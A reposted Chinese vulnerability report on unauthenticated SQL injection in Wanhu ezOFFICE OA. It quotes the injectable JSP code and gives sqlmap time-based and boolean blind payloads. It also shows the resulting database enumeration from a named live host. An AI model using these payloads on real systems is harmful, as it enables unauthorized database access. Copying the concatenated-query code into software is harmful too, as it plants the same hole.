记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

万户OA两处盲注DBA权限(无需登陆)

2014-09-15 22:20

先说通杀标准版和专业版的延时盲注。

注入点:

/defaultroot/outMailLoginCheck.jsp

<%@ page contentType="text/html; charset=GBK"%>

<%

//盾安外部邮件登陆检查

com.whir.common.util.DataSourceBase dsb = new com.whir.common.util.DataSourceBase();

try{

java.sql.Connection conn = dsb.getDataSource().getConnection();

java.sql.Statement stmt = conn.createStatement();

java.sql.ResultSet rs = stmt.executeQuery("SELECT * FROM EZOFFICE.OA_MAILLOGIN WHERE USERACCOUNT='" + request.getParameter("userAccount") + "' AND RANDOM='" + request.getParameter("outMailRandom") + "'");

if(rs.next()){

out.print(true);

}else{

out.print(false);

}

conn.close();

}catch(Exception e){}

%>



一看就知道盲注,在OA_MAILLOGIN表默认为空的情况就只有比较慢的延时盲注了,直接指定sqlmap的technique=T。

先试试标准版的

http://oa.frjt.net:8081/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=

sqlmap identified the following injection points with a total of 125 HTTP(s) requests:

---

Place: GET

Parameter: userAccount

Type: AND/OR time-based blind

Title: MySQL < 5.0.12 AND time-based blind (heavy query)

Payload: userAccount=' AND 4843=BENCHMARK(5000000,MD5(0x4758714c)) AND 'YsEW'='YsEW&outMailRandom=

---

web application technology: JSP

back-end DBMS: MySQL >= 5.0.0



再试试专业版的

oa延时盲注.jpg

漏洞证明:

再就是布尔型盲注了,这个只有标准版有。

/defaultroot/synccustomize_simple.jsp

<%

String flag=request.getParameter("flag");

String menuname = request.getParameter("menuname");

if("sync".equals(flag)){

//数据

String s_String = "";

int s_int = 0;



String[][] res = null;

DbOpt dbopt = null;



try {



dbopt = new DbOpt();

String Sql = "";



Sql = "select MENU_id,MENULEVEL,MENUVIEW,MENUVIEWUSER,MENUVIEWORG,MENUVIEWGROUP,MENUPARENT,MENUURL,MENUORDER,DESKTOP1,DESKTOP2,menuIdString,isSystemInit,INUSE,LEFTURL,RIGHTURL,MENUCODE,menuname from OA_MENUSET where menuname='"+menuname+"' ";



res = dbopt.executeQueryToStrArr2(Sql,18);



if(res != null){



String _cnt = dbopt.executeQueryToStr("Select count(*) from oa_custmenu where menu_name='"+menuname+"' ");

s_int = Integer.parseInt(_cnt);

.......

}else if(s_int>1){

s_String = "查出"+s_int+"条数据,未处理!";

}

}



dbopt.close();



} catch (Exception e) {

e.printStackTrace();

} finally {

try {

dbopt.close();

} catch (SQLException ex) {

}

}

%>

</table>



<table width="100%" border="0" cellpadding="0" cellspacing="0" class="pagebar">



<tr>

<td><%=s_String%>&nbsp;</td>



这里就可以用布尔型盲注,多开点线程速度就妥妥的了。验证:

http://oa.frjt.net:8081/defaultroot/synccustomize_simple.jsp?flag=sync&menuname=%E8%AE%BA%E5%9D%9B

web application technology: JSP

back-end DBMS: MySQL >= 5.0.0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: menuname

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: flag=sync&menuname=%E8%AE%BA%E5%9D%9B' AND 8760=8760 AND 'pBAh'='pBAh

---

web application technology: JSP

back-end DBMS: MySQL >= 5.0.0

available databases [3]:

[*] ezoffice

[*] information_schema

[*] mysql

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-065275

阅读:338179 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“万户OA两处盲注DBA权限(无需登陆)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云